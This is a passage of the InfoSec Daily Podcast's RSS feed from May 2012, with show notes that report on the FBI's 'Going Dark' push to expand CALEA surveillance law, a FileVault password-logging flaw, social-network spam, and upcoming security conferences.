<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI&#39;s proposal would amend a 1994 law, called the </span><a href="http://epic.org/privacy/wiretap/calea/calea_law.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Communications Assistance for Law Enforcement Act</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, or CALEA, that currently applies only to telecommunications providers, not Web companies. The Federal Communications Commission extended CALEA in 2004 to apply to broadband networks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">&quot;Going Dark&quot; timeline</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">June 2008:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> FBI Director Robert Mueller and his aides brief Sens. Barbara Mikulski, Richard Shelby, and Ted Stevens on &quot;Going Dark.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">June 2008:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> FBI Assistant Director Kerry Haynes holds &quot;Going Dark&quot; briefing for Senate appropriations subcommittee and offers a &quot;classified version of this briefing&quot; at Quantico.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">August 2008:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Mueller briefed on Going Dark at strategy meeting.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">September 2008:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> FBI completes a &quot;high-level explanation&quot; of CALEA amendment package.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">May 2009: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FBI Assistant Director Rich Haley briefs Senate Intelligence committee and Mikulsi staffers on how bureau is &quot;dealing with the &#39;Going Dark&#39; issue.&#39;&quot; Mikulski plans to bring up &quot;Going Dark&quot; at a closed-door hearing the following week.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">May 2009: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Haley briefs Rep. Dutch Ruppersberger, currently the top Democrat on House Intelligence, who would later co-author CISPA.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">September 2008: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FBI staff briefed by RAND, which was commissioned to &quot;look at&quot; Going Dark.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">November 2008:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> FBI Assistant Director Marcus Thomas, who oversees the Quantico-based Operational Technology Division, prepares briefing for President-Elect Obama&#39;s transition team.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">December 2008: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FBI intelligence analyst in Communications Analysis Unit begins analysis of VoIP surveillance.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">February 2009: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FBI memo to all field offices asks for anecdotal information about cases where &quot;investigations have been negatively impacted&quot; by lack of data retention or Internet interception.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">March 2009:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Mueller&#39;s advisory board meets for a full-day briefing on Going Dark.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">April 2009: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FBI distributes presentation for White House meeting on Going Dark.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">April 2009:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> FBI warns that the Going Dark project is &quot;yellow,&quot; meaning limited progress, because of &quot;new administration personnel not being in place for briefings.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">April 2009: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FBI general counsel&#39;s office reports that the bureau&#39;s Data Interception Technology Unit has &quot;compiled a list of FISA dockets&#8230; that the FBI has been unable to fully implement.&quot; That&#39;s a reference to telecom companies that are already covered by the FCC&#39;s expansion of CALEA.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">May 2009: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FBI&#39;s internal Wikipedia-knockoff Bureaupedia entry for &quot;National Lawful Intercept Strategy&quot; includes section on &quot;modernize lawful intercept laws.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">May 2009: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FBI e-mail boasts that the bureau&#39;s plan has &quot;gotten attention&quot; from industry, but &quot;we need to strengthen the business case on this.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">June 2009:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> FBI&#39;s Office of Congressional Affairs prepares Going Dark briefing for closed-door session of Senate Appropriations subcommittee.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">July 2010:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> FBI e-mail says the &quot;Going Dark Working Group (GDWG) continues to ask for examples from Cvber investigations where investigators have had problems&quot; because of new technologies.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">September 2010:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> FBI staff operations specialist in its Counterterrorism Division sends e-mail on difficulties in &quot;obtaining information from Internet Service Providers and social-networking sites.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FBI Director Robert Mueller is not asking companies to support the bureau&#39;s CALEA expansion, but instead is &quot;asking what can go in it to minimize impacts,&quot; one participant in the discussions says. That included a scheduled trip this month to the West Coast &#8212; which was subsequently postponed &#8212; to meet with Internet companies&#39; CEOs and top lawyers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A further expansion of CALEA is unlikely to be applauded by tech companies, their customers, or privacy groups. Apple (which distributes iChat and FaceTime) is currently lobbying on the topic, according to disclosure documents filed with Congress two weeks ago. Microsoft (which owns Skype and Hotmail) says its lobbyists are following the topic because it&#39;s &quot;an area of ongoing interest to us.&quot; Google, Yahoo, and Facebook declined to comment.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In February 2011, CNET was the first to report that then-FBI general counsel Valerie Caproni was planning to warn Congress of what the bureau calls its &quot;Going Dark&quot; problem, meaning that its surveillance capabilities may diminish as technology advances. Caproni singled out &quot;Web-based e-mail, social-networking sites, and peer-to-peer communications&quot; as problems that have left the FBI &quot;increasingly unable&quot; to conduct the same kind of wiretapping it could in the past.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition to the FBI&#39;s legislative proposal, there are indications that the Federal Communications Commission is considering reinterpreting CALEA to demand that products that allow video or voice chat over the Internet &#8212; from Skype to Google Hangouts to Xbox Live &#8212; include surveillance backdoors to help the FBI with its &quot;Going Dark&quot; program. CALEA applies to technologies that are a &quot;substantial replacement&quot; for the telephone system.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:'Droid Serif';color:#222222;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-662-crims-quit-spamming-os-x-exposure-symantec-extortion-natural-gas-attack-and-tap-ready-sites/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3915/0/infosec-daily-podcast-episode-662-.mp3" length="22068709" type="audio/mpeg" />
		<itunes:duration>0:45:58</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 662 for May 7, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.
&#160;
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	Whe[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 662 for May 7, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.
&#160;
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012&#160;&#160;&#160; 
	Where: &#160;Veasey Memorial Park, Groveland, MA
	http://granitesec.org
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Hack3rCon^3
When: October 19-21, 2012
Where: Charleston, WV 
	http://hack3rcon.org/ 
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Please consider making your Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
Or simply use our QR Code Links.
Amazon:
Amazon UK:
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://nakedsecurity.sophos.com/2012/05/06/apple-update-to-os-x-lion-exposes-encryption-passwords/
Apple&#39;s had a rough time lately on the security front. Last month it was caught out having delayed the release of a security update for Java, resulting in more than 600,000 Macs being recruited into a botnet. Now a quality assurance mistake can cause OS X users&#39; FileVault encryption passwords to be exposed.
On Friday, David Emery posted to an encryption mailing list disclosing this flaw in the latest OS X Lion security update, 10.7.3, which was released in February.
It appears that a debug option was accidentally left enabled in FileVault, resulting in the user&#39;s password being saved in plain text in a log file accessible outside of the encrypted area.
Anyone with access to the disk can read the file containing the password and use it to log into the encrypted area of the disk, rendering the encryption pointless and permitting access to potentially sensitive documents. This could occur through theft, physical access, or a piece of malware that knows where to look.
To my knowledge, this only applies to users of Snow Leopard who used the FileVault encryption option for their home directories. It does not impact users of FileVault2 who have turned on Apple&#39;s full disk encryption, nor does it impact users who did not upgrade from Snow Leopard.
The best course of action is to implement a full disk encryption solution like Sophos SafeGuard for Mac or Apple&#39;s included FileVault 2.
&#8230;
Source: &#160;http://www.theregister.co.uk/2012/05/06/social_network_spam/
Cybercrims have quit pouring barrels of spam into email inboxes in favour of hassling marks on social networks as an easier way to make money.
The dismantling of remote-controllable armies of compromised PCs, the collapse of some shady affiliate advertising networks, and better spam-filtering technology have all resulted in a decrease in traditional email spam delive[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 661 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-661-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-661-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 06 May 2012 23:25:04 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3899</guid>
		<description><![CDATA[&#160; Episode 661 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 661 for May 5, 2012.  Tonight&#8217;s podcast is hosted by Dr. Bonez and Themson Mester. Guests: oncee and spridel Announcements GraniteSec (formerly The New England InfoSec Tweetup) When:  May 19, 2012 Where:  Veasey Memorial Park, Groveland, MA http://granitesec.org AIDE 2012 When: May [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<h1 style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">Episode 661 &#8211; Weekend Wrap-up with Dr. b0n3z</span></strong></h1>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">InfoSec Daily Podcast Episode 661 for May 5, 2012.  </span><span style="font-size: 13px;font-family: Arial;vertical-align: baseline">Tonight&#8217;s podcast is hosted by Dr. Bonez and Themson Mester.</span></strong></p>
<p><strong><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;vertical-align: baseline">Guests: oncee and spridel</span></strong></p>
<p><strong><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;text-decoration: underline;vertical-align: baseline">Announcements</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">GraniteSec (formerly The New England InfoSec Tweetup)<br class="kix-line-break" /></p>
<p></span><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When:  May 19, 2012<br class="kix-line-break" /></p>
<p>Where:  Veasey Memorial Park, Groveland, MA<br class="kix-line-break" /></p>
<p></span><a href="http://granitesec.org/"><span>http://granitesec.org</span></a></strong></p>
<p><strong><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">AIDE 2012<br class="kix-line-break" /></p>
<p></span><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 21-25, 2012<br class="kix-line-break" /></p>
<p>Where: MU Forensic Science Center &#8211; Huntington, West Virginia<br class="kix-line-break" /></p>
<p></span><a href="http://www.appyide.org/"><span>http://www.appyide.org/</span></a></strong></p>
<p><strong><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">LayerOne 2012<br class="kix-line-break" /></p>
<p></span><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 26-27, 2012<br class="kix-line-break" /></p>
<p>Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /></p>
<p></span><a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a></strong></p>
<p><strong><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br class="kix-line-break" /></p>
<p></span><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /></p>
<p>Where: Courtyard Seattle Federal Way, WA <br class="kix-line-break" /></p>
<p></span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span>http://www.sans.org/mentor/details.php?nid=28014</span></a></strong></p>
<p><strong><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">Social Engineering Training</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21-24, 2012<br class="kix-line-break" /></p>
<p>Where: Black Hat Vegas</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: August 20-24, 2012<br class="kix-line-break" /></p>
<p>Where:  Bristol, UK</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When:  November 12-16, 2012<br class="kix-line-break" /></p>
<p>Where:  Columbia, MD<br class="kix-line-break" /></p>
<p></span><a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></strong></p>
<p><strong><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /></p>
<p></span><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /></p>
<p>When: July 23 &#8211; 24, 2012<br class="kix-line-break" /></p>
<p>Where: Black Hat Vegas<br class="kix-line-break" /></p>
<p></span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span>http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></strong></p>
<p><strong><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">DerbyCon 2012 &#8211; The “Deuce” Reunion<br class="kix-line-break" /></p>
<p></span><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When:  September 27-30, 2012<br class="kix-line-break" /></p>
<p>Where: Louisville, KY<br class="kix-line-break" /></p>
<p></span><a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></strong></p>
<p><strong><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">Hack3rCon^3</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: October 19-21, 2012</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Charleston, WV <br class="kix-line-break" /></p>
<p></span><a href="http://hack3rcon.org/"><span>http://hack3rcon.org/</span></a></strong></p>
<p><strong><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">Skydogcon<br class="kix-line-break" /></p>
<p></span><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: October 26-28<br class="kix-line-break" /></p>
<p>Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /></p>
<p></span><a href="http://www.skydogcon.com/"><span>http://www.skydogcon.com</span></a></strong></p>
<p><strong><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Please consider making your Amazon purchases through our affiliate link.  If you’re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Or simply use our QR Code Links.</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Amazon:</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Amazon UK:</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></strong></p>
<p><strong><br />
</strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;text-decoration: underline;vertical-align: baseline">Stories</span></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:  </span><a href="http://www.wired.com/threatlevel/2012/05/mi6-codebreaker-at-blackhat/"><span>http://www.wired.com/threatlevel/2012/05/mi6-codebreaker-at-blackhat/</span></a></strong></p>
<p style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt" dir="ltr"><strong><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">A top British codebreaker who died a mysterious death in his flat two years ago had just returned from a computer security conference in the United States before his death, according to information disclosed during an inquest this week.</span></strong></p>
